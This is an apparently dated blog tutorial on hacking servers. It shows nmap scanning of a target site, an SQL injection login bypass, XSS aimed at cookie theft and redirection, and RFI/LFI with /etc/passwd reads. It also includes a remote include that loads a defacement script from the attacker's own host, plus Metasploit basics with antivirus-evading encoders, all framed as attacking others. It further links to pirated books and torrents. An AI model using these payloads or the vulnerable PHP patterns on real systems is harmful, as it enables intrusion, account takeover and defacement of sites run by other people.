Welcome to this tutorial. Please know now that unlike in the movies, not everything is hackable. I will be writing about the basics of hacking servers, I will cover how to scan and/or exploit vulnerable daemons (services) running on the target server, and how to discover and/or exploit web-script vulnerabilities. You will need to know your way around a computer before reading this
NOTE: This tutorial has been compiled from a collection of various articles on hacking
Lets start
Recommended Tools
Port Scanner - nmap - http://nmap.org/
Browser - FireFox - http://firefox.com/
-----------------------------------------------------------------------------------
Daemon Vulnerabilities:
Daemons (also commonly known as services) are the processes that run on a computer that allow it to do things such as serve pages with the HTTP protocol, etc. (although they do not always necessarily interact over a network). Sometimes these daemons are poorly coded, which allows for an attacker to send some sort of input to them, and they either crash, or in worse cases, they run any code the attacker chooses
-----------------------------------------------------------------------------------
Scanning For Vulnerabilites:
Well, this is where a little common sense comes in, because we need to answer one question: Which ports to scan? Well, with a little googling, we'd know that the default port for the HTTPD (web daemon) is 80, for the FTPD it's 21, etc. So if we wanted to know the version of the HTTPD running on the server, we'd run "nmap targetsite.com -p 80 -sV". NOTICE the -sV argument; it is vital, otherwise nmap will just return whether or not the port is open, and won't provide us with the daemon's version. This is great and all, but we don't want to just scan one port at a time do we? Well nmap has us covered there, so just scan multiple ports by seperating each target port with a comma (,) like so:"nmap targetsite.com -p 21,80 -sV". However, if you don't mind the scan taking a while longer, you can scan a range of ports like so: "nmap targetsite.com -p 1-1000 -sV"This will scan all ports between 1 and 1000.
-----------------------------------------------------------------------------------
Checking For Vulnerability
After your scan has finished, nmap will display the open ports on your target, along with their version (if they were identifiable, usually they are). An example return would look like this: "80/tcp open http Apache httpd 2.0.32". Taking this information, we search on milw0rm for "Apache". After skimming through the results, we see that the target is vulnerable to this vulnerability, which when run on the target server will make it crash.
-----------------------------------------------------------------------------------
Using the Exploits
This varies, depending on the language that the exploit is coded in. You can google it.you can also use Metasploit..Various exploits repository are available online like the exploit-db, inject0r.So exploits can be searched there.Later I will also share a tutorial on using metasploit
-----------------------------------------------------------------------------------
NOTE: Exploits can be coded in any language.So you need a good control over programming languages. So to develop exploit we must have a good knowledge of programming languages like the C++, perl, python etc. I would recommend learning C/C++ and python bcoz I have seen most exploit coded in them and they are easy to learn also
ommon Web-Script Vulnerabilities
-----------------------------------------------------------------------------------
Common Web-Script Vulnerabilities
Here, I will be writing about vulnerabilities in a web server's server-sided code. Here are the topics I will be covering:
* SQL Injection
* XSS (Cross-Site Scripting)
* RFI/LFI (Remote/Local File Include)
__________________________________________________ _
SQL Injection: SQL injection is the act of injection your own, custom-crafted SQL commands into a web-script so that you can manipulate the database any way you want. Some example usages of SQL injection: Bypass login verification, add new admin account, lift passwords, lift credit-card details, etc.; you can access anything that's in the database.
Example Vulnerable Code - login.php (PHP/MySQL)
Here's an example of a vulnerable login code
PHP Code:
<?php
$user = $_POST['u'];$pass = $_POST['p'];
if (!isset($user) || !isset($pass)) {
echo("<form method=post><input type=text name=u value=Username><br /><input type=password name=p value=Password><br /><input type=submit value=Login></form>");
} else {$sql = "SELECT `IP` FROM `users` WHERE `username`='$user' AND `password`='$pass'";$ret = mysql_query($sql);$ret = mysql_fetch_array($ret);
if ($ret[0] != "") {
echo("Welcome, $user.");
} else {
echo("Incorrect login details.");
}
}?>
Basically what this code does, is take the username and password input, and takes the users's IP from the database in order to check the validity of the username/password combo.
Testing Inputs For Vulnerability
Just throw an "'" into the inputs, and see if it outputs an error; if so, it's probably injectable. If it doesn't display anything, it might be injectable, and if it is, you will be dealing with blind SQL injection which anyone can tell you is no fun. Else, it's not injectable.
The Example Exploit
Let's say we know the admin's username is Administrator and we want into his account. Since the code doesn't filter our input, we can insert anything we want into the statement, and just let ourselves in. To do this, we would simply put "Administrator" in the username box, and "' OR 1=1--" into the password box; the resulting SQL query to be run against the database would be "SELECT `IP` FROM `users` WHERE `username`='Administrator' AND `password='' OR 1=1--'". Because of the "OR 1=1", it will have the ability to ignore the password requirement, because as we all know, the logic of "OR" only requires one question to result in true for it to succeed, and since 1 always equals 1, it works; the "--" is the 'comment out' character for SQL which means it ignores everything after it, otherwise the last "'" would ruin the syntax, and just cause the query to fail. You can refer to my tutorial on mysql injection
__________________________________________________ __________________________________________________ _
XSS (Cross-Site Scripting)
This vulnerability allows for an attacker's input to be sent to unsuspecting victims. The primary usage for this vulnerability is cookie stealing; if an attacker steals your cookie, they can log into whatever site they stole your cookie from under your account (usually, and assuming you were logged in at the time.)
Example Vulnerable Code - search.php (PHP)
<?php
$s = $_GET['search'];// a real search engine would do some database stuff hereecho("You searched for $s. There were no results found");?>
Testing Inputs For Vulnerability
For this, we test by throwing some HTML into the search engine, such as "<font color=red>XSS</font>". If the site is vulnerable to XSS, you will see something like this: XSS, else, it's not vulnerable.
Example Exploit Code (Redirect)
Because we're mean, we want to redirect the victim to goatse (don't look that up if you don't know what it is) by tricking them into clicking on a link pointed to "search.php?search=<script>window.location='http://abc.com/'</script>". This will output "You searched for <script>window.location='http://abc.com./'</script>. There were no results found" (HTML) and assuming the target's browser supports JS (JavaScript) which all modern browsers do unless the setting is turned off, it will redirect them to the abc.com
--------------------------------------------------------------------------------------------------------------------
RFI/LFI (Remote/Local File Include)
This vulnerability allows the user to include a remote or local file, and have it parsed and executed on the local server.
Example Vulnerable Code - index.php (PHP)
PHP Code:
<?php
$page = $_GET['p'];
if (isset($page)) {
include($page);
} else {
include("home.php");
}?>
Try visiting "index.php?p=http://www.google.com/"; if you see Google, it is vulnerable to RFI and consequently LFI. If you don't it's not vulnerable to RFI, but still may be vulnerable to LFI. Assuming the server is running *nix, try viewing "index.php?p=/etc/passwd"; if you see the passwd file, it's vulnerable to LFI; else, it's not vulnerable to RFI or LFI.
Example Exploit
Let's say the target is vulnerable to RFI and we upload the following PHP code to our server
PHP Code:
<?php
unlink("index.php");
system("echo Hacked > index.php");
?>
and then we view "index.php?p=http://our.site.com/malicious.php" then our malicious code will be run on their server, and by doing so, their site will simply say 'Hacked' now.
--------------------------------------------------------------------------------------------------------------------
Recommended for all beginners
For all beginners , who didn't have basic knowledge and want to learn, should visit this site and should check the lesson section:
http://www.hackerhighschool.org/
Those who want to move to advance form of hacking must download this book by VINAY bhai named "access denied". Its a wonderful book and requires programming skills:
http://cid-dca018b0abc58bcb.skydrive.live.com/self.aspx/.Public/Access%20Denied.rar?lc=16393
Other books recommended are:
shellcoder's handbook
gray hat hacking (plz google them )
Writing security tools and exploits:
http://hack0wn.com/filedesc/pdf/Writing%20Security%20Tools%20and%20Exploits.pdf
LinuxCBT Security Edition (video tutorial, excellent) 4.7GB
1. Security Basics (fundamentals)
2. Proxy Security feat. Squid
3. Firewall Security feat. IPTables
4. SELinux Security - MAC-based Security Controls
5. Network Intrusion Detection System (NIDS) Security feat. Snort® NIDS
6. Packet | Capture | Analysis Security feat. Ethereal®|WireShark®
7. Pluggable Authentication Modules (PAM) Security
8. Open Secure Shell version 2 (OpenSSHv2) Security
9. OpenPGP with Gnu Privacy Guard (GPG) Security
10. Secure File Transfer Protocol (SFTP) Security
http://isohunt.com/torrent_details/118749757/linux+cbt+linuxcbt?tab=summary
-------------------------------------------------------------------------------------------------------------
Metasploit is an exploitation framework widely use by hackers, pen testers and security researchers. The Metasploit Framework is a tool for developing and executing exploit code against a remote target machine. The Metasploit Project is also well-known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework
Background: Metasploit was created in 2003 as a portable network game using the Perl scripting language. Later, the Metasploit Framework was then completely rewritten in the Ruby programming language. It is most notable for releasing some of the most technically sophisticated exploits to public security vulnerabilities. In addition, it is a powerful tool for third-party security researchers to investigate potential vulnerabilities. On October 21, 2009 the Metasploit Project announced that it had been acquired by Rapid7, a security company that provides unified vulnerability management solutions.
--------------------------------------------------------------------------------------------------------------------
In this tutorial, I will discuss using metasploits, its commands and its advantages. Now we all have come to know that its a famous exploitation framework used widely. So lets start
Installing on windows:- Download the installer from the site and install it
Installing on Linux:- Refer to metasploit Linux support for installation on linux :
http://www.metasploit.com/framework/support/
Lets get familiar with some common terms to be used:
Exploit: It is the way of getting into the system via a vulnerability or bad setup/configuration.
Payload: It is what we want the exploit to do. A kind of configuration for attack
Auxillary: They are other applications which come with metasploit like teh scanners, detectors and the sniffers
Encoders: With a lot of exploits anti viruses pick them up when an attacker tries to execute the victim box. And what the encoders do is somewhat jumble the code so it makes it a hell of a lot harder for anti viruses to detect them. Very handy.
--------------------------------------------------------------------------------------------------------------------
Commands
Various commands are used in metasploit for attacking and exploitation. Like some of them, I m describing :-
Search: Search is good and is very useful when u dont know the exploit name. U can search for it, for eg. if i don't about a particular exploit for apache server I will find it using search apache
set and setg: Set you would use when your doing a single attack. And Setg means Set Global, so every exploit you test during that session will use the same LHOST & RHOST for eg:
setg LHOST 192.168.1.5
setg RHOST 192.168.1.150
Show: If you type show it will display all the exploits, payloads, auxiliaries it has.
info: What info does is allows you to pull up available information about the exploit .So if you type info exploit it will show you the information metasploit has on it
0 comments:
Post a Comment